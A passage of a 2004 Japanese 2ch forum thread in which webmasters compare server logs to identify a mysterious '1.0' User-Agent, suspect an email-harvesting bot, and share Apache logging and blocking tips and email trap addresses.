ちなみに、livedoorCheckersとかいうのも 9 ですた。

280 :DNS未登録さん:04/11/29 00:08:00 ID:???
アクセスされる側の情報からわかることは、これくらいが限界かな。あとは推理だな。

このツールはどういうふうに拡散するんだろうか。YahooBBが多いが、OCNやほかの
ISP加入者もかなりいて、全国に散らばっているということは、何を意味するんだろうか。
広く配布されているツールだったり、トロイやワーム的に拡散するものだったりしたら、
ac.jpやco.jpからのアクセスもあってよさそうなのに。

281 :DNS未登録さん:04/11/29 00:41:28 ID:???
210.156.21.18ってIPからきた。鳥取の中海テレビというCATVか。なんで、
日本国内のISPという限定のなかでこんなに拡散しているんだ。

282 :DNS未登録さん:04/11/29 01:15:15 ID:???
>>280
確かに ac.jp や co.jp は見かけないな。
プロバイダ固有のツールなのかな。


283 :DNS未登録さん:04/11/29 12:26:05 ID:???
プロバイダのスターターキットに付いてるツールという可能性も。

284 :バッカーです ◆KeuXjwWDdE :04/11/29 14:48:41 ID:???
【謎のUA 1.0 今までのまとめ】
・User-Agentが 1.0
・リファラーは吐かない
・国内ISP経由からのリクセストばかり。その中でもYahooBBはかなり多い
・企業、大学からはほぼゼロ
・地域的な偏差はみられない
・日本中に蔓延している

285 :DNS未登録さん:04/11/29 14:54:54 ID:???
あと HTTP_HOST が "サーバ名:80" ね

Yahoo! BBカスタマーサポートセンターにメールで訊いてみた
調べてみるけど時間はかかるとのこと


286 :DNS未登録さん:04/11/29 20:46:06 ID:???
極めてまれだが、btcentralplus.comからのアクセスがある。
http://www18.big.or.jp/~fujiwara/ikki/admin/ashiato/analyze.cgi
で「個別 1000 」にして表示更新。

外国から?と思ったら、結構日本人のユーザがいるとこなんだ。
http://www.google.co.jp/search?hl=ja&q=%22btcentralplus.com%22&btnG=Google+%E6%A4%9C%E7%B4%A2&lr=lang_ja&num=100

287 :DNS未登録さん:04/11/29 20:59:07 ID:???
9月28日のところ
http://01code.chu.jp/yuki_shiro/d_log200409.html

288 :DNS未登録さん:04/11/30 01:34:57 ID:???
1.0で誘導されてきました。あの、質問なんですが、1.0が最初に確認されたのは
何月何日からなんでしょうか。アクセス数が多いのでWindowsのツールだと思うので
ソフト紹介のサイトを漁ってみようと思うのですが

289 :DNS未登録さん:04/11/30 02:17:42 ID:???
>>288
このスレで確認できる最古は>>227の一月。
目立つようになったのは夏くらい。

何かわかったら報告よろしく。

290 :DNS未登録さん:04/11/30 04:21:50 ID:???
スラッシュドットに密告して情報を募るというのはどうでしょうか

291 :DNS未登録さん:04/11/30 09:02:49 ID:???
>>278
そのスレの957です。
それを書き込んだ後に間違いに気づいたんで一応報告。

そこで書いてる『移転前のサイトの鯖』では生ログ貰えなかったし、
解析もindex.htmlにしか置いてなかったから
(まあ『1.0』が来た当時は他にページは無かったわけだが)
本当に「index.htmlにしかアクセスされたことが無い」のかどうかは不明。

292 :DNS未登録さん:04/11/30 13:26:50 ID:???
favicon.icoへのアクセスが増えてんだけど、やっぱりFirefox?

293 :DNS未登録さん:04/11/30 19:49:31 ID:???
>292
そう考えるのが自然だろうな。


294 :DNS未登録さん:04/12/01 00:17:57 ID:???
お気に入りに登録するときは普通は何秒かの時間が入る。
Firefoxは1秒以内にfavicon.icoをGETしに来る。
しかも何発も。

295 :DNS未登録さん:04/12/01 01:54:55 ID:???
めんどくせえから火狐使ってる厨は全部弾こうぜ

296 :DNS未登録さん:04/12/01 04:32:34 ID:???
この仕様は変更して欲しい
なんでアクセス毎にお気に入りアイコンをとってくのかまたくわからん

297 :DNS未登録さん:04/12/01 10:46:55 ID:???
>296
タブにアイコンを表示するためだろ。
ただあまりにも多いのならキャッシュ関連のバグだろうね。

298 :DNS未登録さん:04/12/01 11:13:51 ID:???
>>296
同じく仕様を変更して欲しい。
IEでお気に入りに登録するときに有無を言わさずfaviconにアクセスする仕様も
どうかと思ってたが、まさかFirefoxがこんな仕様になるとは思わなかった。
(とは言え、自分のFirefox 1.0ではこんなことは無いのだが)

リンク切れ把握のためにエラーログを確認してるんだが(faviconは置いてない)、
Firefox 1.0ユーザが来るとfaviconへのアクセスがやたらと増えてうざすぎ。

299 :DNS未登録さん:04/12/01 12:09:53 ID:???
*ico へのアクセスでログ取らないようにすればいいよん

300 :DNS未登録さん:04/12/01 13:43:56 ID:???
1.0を弾くようにしたら Mozilla/4.0 (compatible; MSIE 6.0; Windows 98) を名乗ってきてませんか?
img や css へのアクセスは無く アクセスの仕方が 1.0 と、そっくりなんですが…

あとSSIの解析には残らない WebRescuer v0.2.4 ってのも1日に50アクセス位あった なんでしょこれ?

301 :DNS未登録さん:04/12/01 14:25:16 ID:???
前者はわかんね
後者はぐぐれば簡単に特定出来るだろ

302 :DNS未登録さん:04/12/01 18:31:25 ID:???
Mozilla系のブラウザって<link rel=icon とか書いてあるとアクセスするたびに
アイコンも取りに行くよね?

>>300
n a b a r ?

303 :DNS未登録さん:04/12/01 21:20:01 ID:???
>>300
それはないなあ。

古いログを見直したてみた。あまり多くないからそのときは気がつかなかったんだが、1.0は
去年から来ていた。一ヶ月に数十アクセスくらい。日本のISPからとかいった
パターンは同じだ。

304 :199:04/12/01 21:33:12 ID:???
211.9.44.97 - - [11/Sep/2003:19:04:49 +0900] "GET /~hoge/ HTTP/1.0" 200 429 "-" "1.0"
私のところでは、去年の9月が最初でした
10月以降ではディレクトリを階層的にアクセスするパターンが見られます
気づくのに1年かかったわけか。。

305 :DNS未登録さん:04/12/02 00:07:26 ID:???
>>300
Mozilla/4.0 (compatible; MSIE 6.0; Windows 98) の似たようなアクセスは
スパム業者のアクセスです。全信協でググってみてください

306 :DNS未登録さん:04/12/02 15:14:09 ID:???
'1.0'、うちの2002年3月以降のログを調べたら、
2002年に4件(3月に1件、6月2件、11月1件)、2003年11月に1件来ていた。
急増したのは今年の9月以降。
2004年は1月=3件、以降 2=0、3=5、4=9、5=19、6=23、7=16、8=6、9=258、10=293、11=274。
正体さえ分かればねぇ…。

307 :DNS未登録さん:04/12/03 00:45:31 ID:???
一ヶ月に数件とか数十件とかなら、別に害はないし、気にとめなかったのもしかたない。

ここにも .htaccess で弾いている人が。
http://dullahan.m78.com/blog_data/archives/2004/0411102111.html


308 :DNS未登録さん:04/12/03 04:30:28 ID:axSLGDO8
携帯からのアクセス増えたなぁ

309 :DNS未登録さん:04/12/03 15:58:51 ID:???
PV

310 :DNS未登録さん:04/12/04 00:03:00 ID:???
気づく人が増えてきたようだ。

http://nie-ya.daa.jp/index.php?eid=27

311 :DNS未登録さん:04/12/04 00:15:05 ID:???
同じく
http://chronoflyer.ddo.jp/~trinary/u_sennju/d_041118

312 :DNS未登録さん:04/12/04 01:19:51 ID:???
ここを見てブログのネタにしyぴじうyんphpjじj@あ

313 :バッカーです ◆KeuXjwWDdE :04/12/04 01:59:15 ID:???
>>311
スパマーと決め付けてるけどね。どうなんだろうか

314 :DNS未登録さん:04/12/04 03:49:37 ID:???
>>312
そういう奴もいるだろうな。


315 :DNS未登録さん:04/12/04 04:49:58 ID:???
>>313
すまん それは俺が書いた。
それ書いてからここに来た。
スパマーの特徴と共通してるからまとめて拒否してる。
今のところの見解は、皆さんと同じで謎。

316 :DNS未登録さん:04/12/04 05:01:44 ID:???
>>315
『HTTP_HOST が ":80" で終わるもの』
の弾き方教えてくださいm(_)m

317 :315:04/12/04 05:10:07 ID:???
>>263に書いたように単なるスパマーではないかなと思ってます。
一応、それ関連のログは
http://chronoflyer.ddo.jp/open/spam_log
にリアルタイムで公開してるのでどうぞ。
見てもわからんけど。
で、>>285に書いたようにyahoobbに問い合わせてみてるけど
返事はまだ来ません。

318 :315:04/12/04 05:13:57 ID:???
>>316
http://chronoflyer.ddo.jp/doc/robot.shtml#4-3
にまとめてあるので参考にしてください。
ただし、ログには403(Forbidden)として残ってしまいますが。

319 :315:04/12/04 05:20:53 ID:???
>>316
個別にログを取るのも
# spam
SetEnvIf Host ":80$" spam
CustomLog /var/log/apache2/spam_log combined env=spam

とかするとよいでしょう。
僕はちょっと違ったログの取り方をしてますけど。

320 :DNS未登録さん:04/12/04 09:55:54 ID:???
Yahoo!BBやOCNが多く、.ac.jpや.co.jpがない、というところはスパム屋っぽい。

ただ、よくわからないが、スパム屋っていうのは、すぐ移転できるようなところを
使うもんだと思ってた。kvision.ne.jp(山口県下松市)とかchukai.ne.jp(鳥取県米子市)とか、
ローカルなCATVから発信するのかな。正直、わからないので教えてほしい。

321 :310:04/12/04 10:18:15 ID:???
リンクできなかった。
http://nie-ya.daa.jp/index.php?day=20041128
Yahooの、のところ。

322 :DNS未登録さん:04/12/04 11:16:34 ID:???
>>318
乙。
参考にさせてもらいます。

323 :316:04/12/04 18:04:43 ID:???
>>315
早速、設定してみます。
解析のブラウザ統計がWIN98だらけになって困ってました。
有難うございます。

324 :DNS未登録さん:04/12/04 19:40:09 ID:???
わりと早く気づいていた人もいたわけだ。

http://www.fenix.ne.jp/~G-HAL/whatsnew/20041st.html
Sat,07 Feb,2004

http://www2.starcat.ne.jp/~yaoshi/diary/?200404
2004年04月15日(木)

325 :DNS未登録さん:04/12/04 22:26:32 ID:???
どうでもいいけど直リンはやめとこうぜ。

326 :DNS未登録さん:04/12/05 05:04:03 ID:3r9OWogT
別にいいんじゃないの?http_reffer はここじゃないし。リンクやめろってこと?

327 :DNS未登録さん:04/12/05 06:28:26 ID:???
h 抜きなんて前時代の人のすることですよ(´∀`)

328 :DNS未登録さん:04/12/05 07:13:56 ID:???
でも初めてリンク書いたときは意味もなく緊張した

329 :DNS未登録さん:04/12/05 07:28:07 ID:???
>>326みたいな馬鹿がいるからページ潰したりする奴が出て来るんだよな
折角の有用な情報が消される事も少なくない

330 :DNS未登録さん:04/12/05 07:53:56 ID:???
ソース無いと意味ないのでは?
それにここの人そんなに多くない

331 :DNS未登録さん:04/12/05 08:55:45 ID:???
2ch自体かなり人減ったしね

332 :DNS未登録さん:04/12/05 09:45:30 ID:???
>>326みたいな馬鹿がいるからページ潰したりする奴が出て来るんだよな

「風が吹くと桶屋がつぶれる」ですか

333 :DNS未登録さん:04/12/05 09:47:29 ID:???
世の中には2ch嫌いな人がいる訳で。
リファラが2ch絡みだったりするとコンテンツ消したりとかよくある。
だから直リンは辞めろって昔から言われてるんだっつーの・・
新参者で何も判ってないなら前からある暗黙の了解に従っとけよボケ

334 :DNS未登録さん:04/12/05 10:04:43 ID:???
でも今のところ1.0関連で有用なページは無いな。

335 :DNS未登録さん:04/12/05 10:43:33 ID:???
>>334
それがテーマなわけだ。笑

336 :DNS未登録さん:04/12/05 12:40:27 ID:???
「1.0」って、これ違いますかね?

MAILMAN
ttp://www.mailpro.zc.bz/

337 :DNS未登録さん:04/12/05 13:59:21 ID:???
>>336
お試し版入れて試してみた。
結果は……

"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"

HTTP_HOST の末尾にも":80"は付かないようだ。
でも、これも嫌なソフトだな。かなりえげつないアクセスしてたよ。

338 :DNS未登録さん:04/12/05 14:12:11 ID:???
糞業者用に作られたメアド巡回ソフトなんてそんなもんだ

一瞬思いついたけど、全然関係の無いドメイン・・というより、
asdfghjkl.comのように適当なアドレスを大量に罠ページに仕掛けておいて
巡回ソフトのメール送信時にオーバーフローってさせられないのかな

339 :DNS未登録さん:04/12/05 20:29:18 ID:???
robots.txtは見てないね・・・>1.0
ワケワカラン

340 :DNS未登録さん:04/12/05 23:12:40 ID:???
>338
どうせウィルスなどの不正アクセスはアドレス直打ちでくるから、
Virtual domainで罠しかけとくってのはありだな。
恐ろしく遅いペースでパケット返すとか、巨大データを食わせて
やるとか。

341 :DNS未登録さん:04/12/06 10:09:04 ID:???
USER_AGENTが「1.0」のみ、ってなんだろね。
ここで話題になっていて嬉しかった。
春からずっと謎だったので。。。。。

うちも1日50件はアクセスあるよ。。。。

あいかわらずググってもあまり情報ないし。。。。
うーん。

本格的にどこかで情報を募集したほうがいいのかもねー
きちんと情報が得られるような場所で...

342 :DNS未登録さん:04/12/06 13:33:06 ID:???
>>340
ウィルス関連はPC側で対策しておけば問題ないから
アドレス巡回ソフトに罠仕掛けてみるかな

スレ建てたら結構面白そうだと思うんだけど

343 :DNS未登録さん:04/12/06 19:57:19 ID:???
どこかの業者か何かが、UserAgentを"1.0"にしてスクリプトを走らせた。

それを見た同業者たちが真似し始めた。

(次第にUserAgent "1.0" が話題になり始める)

話題になっているのを見て、色々な香具師がUserAgentを"1.0"にし始める。

収拾がつかなくなる。

<現在>

344 :DNS未登録さん:04/12/06 20:26:03 ID:???
それでは、揃って同じファイルにアクセスしてくる理由が分からない。

345 :バッカーです ◆KeuXjwWDdE :04/12/07 02:31:41 ID:???
アクセスしないファイルは新しいね。
古いページからリンク張ってもアクセスしてこない。
もう随分経つのに。

346 :DNS未登録さん:04/12/09 20:09:27 ID:???
Googleとかinfoseekのツールバーはどんな足跡だっけ?

347 :DNS未登録さん:04/12/09 20:48:06 ID:???
"HTTP agent" って何よ。
昔からいて"1.0"並に気になるんだが

348 :DNS未登録さん:04/12/09 21:18:36 ID:???
AgentっていうとMI6とかかな??

349 :DNS未登録さん:04/12/09 23:50:07 ID:???
うち、自ドメインですが、全然"1.0"はこないよ。
なぜ?

350 :DNS未登録さん:04/12/10 09:09:09 ID:???
マイナーすぎるからだろ。。。

351 :DNS未登録さん:04/12/10 09:10:15 ID:???
トレンドに乗り遅れているから(w

352 :DNS未登録さん:04/12/11 00:47:36 ID:???
11月30日にアク禁処分
http://shuhoudou.zive.net/~yas_/000200.php#more

353 :DNS未登録さん:04/12/11 20:39:08 ID:???
http://lists.sourceforge.jp/mailman/archives/tep-j-general/2004-November/003148.html

354 :DNS未登録さん:04/12/13 06:01:35 ID:oNq/MYzC
勉強になるのでage

355 :DNS未登録さん:04/12/15 17:42:33 ID:gREWA+Ct
そろそろ誰かUserAgentが「1.0」のみ、の原因がわかった人いない???
情報の蔓延している2chで、こんなに長期間わからないなんてことがあるのか…

日本のみからのアクセスで大学や企業のログがない、ってことは
2chブラウザだとかその関係だと思ったんだけど
全然違うみたいだね....
なんだろう........

日に日に増える1.0のアクセス。


356 :DNS未登録さん:04/12/15 21:13:33 ID:???
色々と細工をしてみた・・・ハヤクコイコイ

357 :DNS未登録さん:04/12/15 21:35:16 ID:XV17JEz+
csv形式のファイルを解析できるフリーソフトありますか?

358 :DNS未登録さん:04/12/15 22:28:47 ID:???
>>357
grep sort uniq

359 :DNS未登録さん:04/12/16 01:41:17 ID:???
>>357 MySQL

360 :DNS未登録さん:04/12/16 19:16:08 ID:???
>>357 OOo


361 :DNS未登録さん:04/12/16 20:57:37 ID:???
>>357 awk

362 :DNS未登録さん:04/12/16 21:42:05 ID:???
>>357
NOTEPAD.EXE

363 :DNS未登録さん:04/12/16 22:18:42 ID:???
>>357 WSH

364 :DNS未登録さん:04/12/16 22:31:17 ID:???
>>357 エクセルビューア

365 :DNS未登録さん:04/12/17 00:19:46 ID:???
>>357 Borland C++ Compiler 5.5

366 :DNS未登録さん:04/12/17 09:22:19 ID:???
>>357
Microsoft EXCEL

367 :DNS未登録さん:04/12/17 11:38:24 ID:???
>>366
> フリーソフトありますか?

368 :DNS未登録さん:04/12/17 11:44:02 ID:???
>>367
openoffice

369 :DNS未登録さん:04/12/17 12:48:46 ID:???
各地でしこんでいるらしい対”1.0”用トラップの調子はどうだい?

370 :DNS未登録さん:04/12/17 13:01:18 ID:???
OOo=OpenOffice.org

371 :DNS未登録さん:04/12/17 14:27:21 ID:???
>>357
perl, ruby, gcc...

372 :DNS未登録さん:04/12/17 14:40:03 ID:???
>>369
http://www.spamgourmet.com/
↑を使ってトラップ張ってるけど,一向にかからないよ
一昨日から自鯖のメアドも一つ餌として置いてみたけど
今のところ反応なし

373 :DNS未登録さん:04/12/17 16:15:03 ID:???
>>357
eye

374 :DNS未登録さん:04/12/17 21:48:45 ID:???
>>357 ひまわり

375 :DNS未登録さん:04/12/17 22:33:19 ID:???
http://www.xappec.com/cgi_bin/kkn/index.cgi?d=20041207
[家鯖] − アドレス収集ロボだったらスッコロヌ −

376 :DNS未登録さん:04/12/17 22:42:29 ID:???
http://www.lain.ais.ne.jp/~yosiho/DIARY/diary.html
12/13

377 :DNS未登録さん:04/12/18 20:44:05 ID:???
マイナーサイトなんでまだ1匹しか・・・

378 :バッカーです ◆KeuXjwWDdE :04/12/18 20:53:07 ID:???
ここに来て急に減ってきました。一時は100越えてたのに昨日は45。
別の何かに化けたのかな?
一ヶ月前に張ったリンクには未だ来ません。

379 :DNS未登録さん:04/12/18 21:56:08 ID:???
ここ見られてたりしてな。

380 :DNS未登録さん:04/12/18 22:14:32 ID:???
多分見てるだろ。

>>379だったりしてな。

381 :DNS未登録さん:04/12/19 00:04:04 ID:???
単に面白がって厨がやってただけ〜

382 :DNS未登録さん:04/12/19 12:41:46 ID:FNofY6yO
httpdのreferer.logを見やすくしてくれるソフトとかありますか?

383 :DNS未登録さん:04/12/19 15:00:25 ID:???
あぱちぇぉgヴぃうぇr

384 :DNS未登録さん:04/12/19 17:15:19 ID:???
yahoobb220046016190.bbtec.net と zs136018.ppp.dion.ne.jpのUAが
ある時間を境に1.0からMozilla/4.0 (compatible; MSIE 6.0; Windows 98)に
変わっていた。単に接続元が変わったのかもしれないが、変わったあとの
アクセスがどうもメアド収集らしい絨緞爆撃にみえる。



385 :DNS未登録さん:04/12/19 20:15:46 ID:???
>>384
具体的な時間よろ。
このスレのレス番指定でもいいや。

386 :384:04/12/19 22:13:13 ID:???
yahoobb220046016190.bbtec.netは12月14日まで1.0、15日からMozilla/4.0
zs136018.ppp.dion.ne.jpは12月7日の12時ごろが境。


387 :DNS未登録さん:04/12/19 22:29:16 ID:???
12/7頃にうpだてしたソフトが怪しいと。

388 :DNS未登録さん:04/12/19 23:16:04 ID:???
>>384
http://216.239.63.104/search?q=cache:VAkOSfsgu8IJ:www.cam.hi-ho.ne.jp/cgi-bin/user/ken6/to.cgi+%22yahoobb220046016190.bbtec.net%22&hl=ja&lr=lang_ja&ie=UTF-8

yahoobb220046016190.bbtec.net は 12/01にもMozilla/4.0 (compatible; MSIE 6.0; Windows 98)のようだね


389 :384:04/12/19 23:25:44 ID:???
yahoobb220046016190.bbtec.net は 12/12 に1.0 だ。
http://www.google.co.jp/search?q=cache:yIVOmdeyCLQJ:www.artn.co.jp/support/counter/acs_stat6.html+%22yahoobb220046016190.bbtec.net%22&hl=ja

同じ接続元だと仮定しての話だが、User-Agentを時々変えているのか

390 :384:04/12/19 23:54:56 ID:???
Apachelogviewerを使っている人は、Statisticsのほうで、上をHost、下をAgentに
して、Hostを一つずつ下げていくとAgentの窓で 1.0とMozilla/4.0 (compatible; MSIE 6.0; Windows 98)
になるのがないか、みてほしい。
もちろんCATVとかからアクセスは接続元が一箇所でないことが明らかだから除いて。

391 :DNS未登録さん:04/12/20 02:31:53 ID:???
>>390
"1.0"で他のUAでもアクセスしているものを調べてみた。
特に規則性は見受けられない。でもところどころ怪しいものもある。

gk6.leo-net.jp 11/29 - 12/19
12/08だけ"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)"で正常なアクセス。
他は"1.0"

i222-150-95-133.s05.a015.ap.plala.or.jp 11/25 - 12/15
11/29に"アドレス収集+方法"というキーワードでyahoo検索から、"Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)"
他は"1.0"

asf-cable.c-able.ne.jp 12/01 -12/16
12/11だけ"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)"で正常なアクセス。
他は"1.0"

yahoobb220001104004.bbtec.net 11/22 - 12/16
11/23と12/15に"アドレス収集"というキーワードでyahoo検索から
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"で来てる。

fw254.wainet.ne.jp 11/25, 12/09 - 12/14
11/25は"Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"だけど正常なアクセス。スパマーではない。
12月のアクセスは"1.0"

p2125-ipad35sizuokaden.shizuoka.ocn.ne.jp 12/05 - 12/07
12/06だけ"1.0"。
5日と7日は"Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"でスパマー。

61-199-185-202.catvy.ne.jp 12/04, 12/06, 12/13
12/06に"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"で普通のアクセス。
4日と13日は"1.0"

67.36.44.61.ap.yournet.ne.jp 12/05, 12/09
5日は"Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"でスパマー。
9日は"1.0"

392 :DNS未登録さん:04/12/20 08:58:21 ID:???
>>391 Tnx
あやしいな。

p2125-ipad35sizuokaden.shizuoka.ocn.ne.jp 12/05 - 12/07
12/06だけ"1.0"。
5日と7日は"Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"でスパマー。

67.36.44.61.ap.yournet.ne.jp 12/05, 12/09
5日は"Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"でスパマー。
9日は"1.0"

393 :DNS未登録さん:04/12/20 09:29:34 ID:/qrW7/xP
 おいらもhttpdのreferer.logをわかりやすく集計してくれるソフトを
探しているんですが、何か情報ないですかねぇ?

394 :DNS未登録さん:04/12/20 17:59:53 ID:???
「1.0」、昨日トップに166アクセス。
なんかここ1週間で、アホみたいに増えてきた気がする。

普通のUAでもアクセスあるってのは、
やっぱりトロイ系のなんかじゃないのかな?

395 :DNS未登録さん:04/12/20 20:36:16 ID:???
"1.0"
これってHost名できてる?

396 :DNS未登録さん:04/12/20 21:25:16 ID:Ql8i0aw9
追記があった。
http://shuhoudou.zive.net/~yas_/000200.php

397 :DNS未登録さん:04/12/20 21:34:42 ID:???
"1.0"が、トロイやメール収集ロボットだと仮定して
1つ疑問があるんだが
日本のプロバイダからしかアクセスがないということは
日本のメール収集ロボットなのかな?

"1.0"は毎日10回以上コンスタントにアクセスがあるが、
日本以外のプロバイダだった試しがないんだよな......

日本でつくられた、日本人のためのメール収集ロボットということか...?
トロイだったら海外にも広がる気がする。

398 :DNS未登録さん:04/12/20 21:44:54 ID:???
>>394
Mozilla/4.0 (compatible; MSIE 6.0; Windows 98) がフツーのUAと言えるかどうかは
ビミョーなところ。

399 :394:04/12/21 12:22:41 ID:???
>>398
確かにそうなんだけど、とりあえず普通っぽいUAの時は
ログ見ると普通にアクセスしてるんだよね。
UAを作ってる、作ってないは別として、
多分ブラウザで普通にアクセスしてる気がするよ。

400 :DNS未登録さん:04/12/21 16:27:44 ID:???
あまりに「1.0」のアクセスばかりになってきたので
>>396の方法で「1.0」弾いちゃったよ


401 :356:04/12/21 20:52:57 ID:???
1.0様専用メールアドレスには何も来てない・・・

402 :DNS未登録さん:04/12/21 22:23:01 ID:???
>>396
>このことからこの「1.0」はリンクを追わない(事前に与えられたリストに従って動いてるだけ)か、
>リンクをインデックスする速度が極めて遅いロボットかだと推察してます。
には納得。ただ、
>もしワタシの想像通りこのロボットがメアド収集を目的としているなら、この動作は理に適ってます。
>連絡先のメールアドレスは、「ディレクトリ内のファイル」よりも「ディレクトリインデックスとして
>表示されるファイル」のほうに記述されてる可能性(蓋然性?)が高い。
はどうかな?


403 :DNS未登録さん:04/12/21 23:54:18 ID:???
>>356
俺もかなり前から罠張ってるけど全然来ない。
メアド収集ではないんじゃないだろうか。

あとindex.*みたいなのを置いてないディレクトリにも来てるんだけど
このディレクトリにあるファイル(*.htmlみたいなの)には
少なくとも最近はまったく来てないんだよね
うちでは完全にディレクトリ狙い。

404 :DNS未登録さん:04/12/22 00:30:49 ID:???
うーん、解ったのは主なアクセスの法則性だけか。
正体は未だ不明のまま…

405 :DNS未登録さん:04/12/22 03:19:42 ID:???
そうですね、決まったディレクトリだけ何度も繰り返しアクセスはあるけど、
サイト全体をなめるようにアクセスはしてないみたいだから、
クローラの類じゃない気はしますね。

結局ナゾなままか。

406 :DNS未登録さん:04/12/24 02:14:19 ID:???
スレが1.0に占領されているな。。

407 :ぼるじょあ ◆yBEncckFOU :04/12/24 02:31:27 ID:???
(・3・) エェー じゃあボクが変わりにのっとろうKA?

408 :DNS未登録さん:04/12/25 03:58:15 ID:???
RSSMngで1時間おきに爆撃してくる奴がウザかったので強制退去処分に科した。

409 :DNS未登録さん:04/12/25 10:38:02 ID:Fqp2Jl65
c4s-nat.cty-net.ne.jp - - [24/Dec/2004:09:37:09 +0900] "GET / 345 :名無しさん@お腹いっぱい。 :04/12/ HTTP/1.1" 404 215
c4s-nat.cty-net.ne.jp - - [24/Dec/2004:09:37:09 +0900] "GET / 345 :名無しさん@お腹いっぱい。 :04/ HTTP/1.1" 404 215
c4s-nat.cty-net.ne.jp - - [24/Dec/2004:09:37:09 +0900] "GET / HTTP/1.1" 200 1355
ANHTTPDで鯖してます。 これってなんですか?

410 :DNS未登録さん:04/12/25 16:09:09 ID:???
>>409
本当だとしたらまさに "1.0" と同じ挙動だな。

411 :DNS未登録さん:04/12/25 20:00:59 ID:???
うちでも"1.0"が嗅ぎ回っていてうざい。早速ポアしますた。

412 :DNS未登録さん:04/12/25 21:32:11 ID:???
暇なツーチャンネラが遊んでるだけだって。

413 :DNS未登録さん:04/12/25 21:58:21 ID:???
うちにくる c4s-nat.cty-net.ne.jp は、ほとんど全部 1.0 だ。

414 :DNS未登録さん:04/12/26 00:22:21 ID:???
たぶん、ここ見ながら狙ってるんだ。

415 :DNS未登録さん:04/12/26 04:54:00 ID:???
多分、

1. なんか実験で作ったツールのUAが(1.0)
2. 1.を真似てUA変えて遊んだやつ
3. 2.を真似てUA変えて遊んだやつ

って感じで拡散じゃね?

416 :DNS未登録さん:04/12/26 11:25:45 ID:???
>>343

417 :DNS未登録さん:04/12/26 18:09:50 ID:???
google にインデックスされてないページに 1.0 は来ない。

google にインデックスされてから数時間後に 1.0 が来た。
1.0 が来なくなったと思ったら google から消えていた(w


418 :DNS未登録さん:04/12/26 19:16:25 ID:???
そもそも、UA変えただけのブラウザとは違うし・・・

419 :DNS未登録さん:04/12/26 19:50:33 ID:???
>>343とかの単純なものじゃないってばさ。
複数のIPから、同一のターゲットにリクエストするこの挙動は、
少なくともスパイウェア系のツールだろ。

420 :DNS未登録さん:04/12/27 10:27:55 ID:???
おもしろがってUAを変えているだけなら、ac.jpやco.jpからのアクセスがあってもいいはずだ。
大学や会社内にだって個人が自由に使っているパソコンはいくらでもあるからな。
そういうところからこのアクセスがないことからして、スパム屋がからんでいるとにらんで
いるんだが。



421 :356:04/12/27 22:35:24 ID:???
>621
どうもありがd
出来れば上位3バイトが一致してるトコが理想なんだけどね・・・

422 :421:04/12/27 22:37:33 ID:???
誤爆orz

423 :DNS未登録さん:04/12/28 00:15:33 ID:???
http://expserver.homelinux.net/~peo/diary/20041218.html#p02
2004-12-18
>たぶん日本人向けのspamメールだかフィッシング詐欺メールを作る業者が作ったアドレス収拾ソフトだと思われる.
>ところでアクセス先を日本のサイトに限定する方法は適当な日本語でググるとかいろいろあるだろうが,収拾
>ソフトを日本のホストにだけばら撒く方法はなんだろう.日本人しか使わないソフトウェアにトロイの木馬として
>組み込まれているのだろうか?

424 :DNS未登録さん:04/12/28 16:37:51 ID:???
とりあえず、1.0トラップ掛けて2ヶ月くらいたつけど、
未だにそのメアドに何も来ない。

これだけ大がかりに広がってるくらいのソフトなのに
アドレス収集目的で実は収集出来てないってのはちょっと考えにくいな

425 :DNS未登録さん:04/12/29 14:23:03 ID:???
メアド収集部分にバグがあるとかだったら笑うな。

426 :バッカーです ◆KeuXjwWDdE :04/12/29 19:20:36 ID:???
最近、急激に減って全盛期の3割くらいしかないです。

427 :DNS未登録さん:04/12/29 22:06:54 ID:???
他のものに変えてるんじゃないかな。
いずれにせよ気味悪いので注視する必要があるかもしれんが・・・

428 :DNS未登録さん:04/12/31 02:51:27 ID:???
業者さんも年末年始は休むんじゃないの?

429 :DNS未登録さん:04/12/31 07:43:12 ID:???
ロボットは働くんじゃねーの?

430 :DNS未登録さん:04/12/31 17:34:06 ID:???
>428
サポートは休むだろうが、必要最小限度の緊急対応要員はいるだろ。
....そこの顔が青くなったISP、素直に白状しなさい :-P

431 :DNS未登録さん:05/01/04 18:47:40 ID:???
年が明けてから1.0が一度も来てない。
そのかわり台湾方面から「3」というUAがMVAClientとセットで来るようになった。

432 :DNS未登録さん:05/01/04 20:46:19 ID:???
ドキュメントルートに1日大体150ヒット位。
相変わらず来続けてるよ。

433 :DNS未登録さん:05/01/04 21:59:48 ID:???
何度も何度も同じトコ来て何をしてるんでしょうね・・・

434 :DNS未登録さん:05/01/05 15:02:29 ID:???
# スレ違いだったらすまそ。

apache のログなんだけど
xxx.xxx.xxx.xxx - - [02/Jan/2005:17:11:08 +0900] "GET /aa/bbb/bbs/index.html
HTTP/1.1" 200 11019 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
xxx.xxx.xxx.xxx - - [02/Jan/2005:17:11:09 +0900] "GET /aa/ccc/bbs/index.html
HTTP/1.1" 200 10145 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
xxx.xxx.xxx.xxx - - [02/Jan/2005:17:11:10 +0900] "GET /aa/ddd/bbs/index.html
HTTP/1.1" 200 9837 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
xxx.xxx.xxx.xxx - - [02/Jan/2005:17:14:41 +0900] "GET /aa/eee/bbs/index.html
HTTP/1.1" 200 12382 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
xxx.xxx.xxx.xxx - - [02/Jan/2005:17:14:42 +0900] "GET /aa/fff/bbs/index.html
HTTP/1.1" 200 10009 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
こんなログが大量に吐かれてます。

各 index.html には .jpg とかあるんだけど、それは持って行かない。
これって、referer 嘘ついてるメイルアドレス収集ワームかなんか?
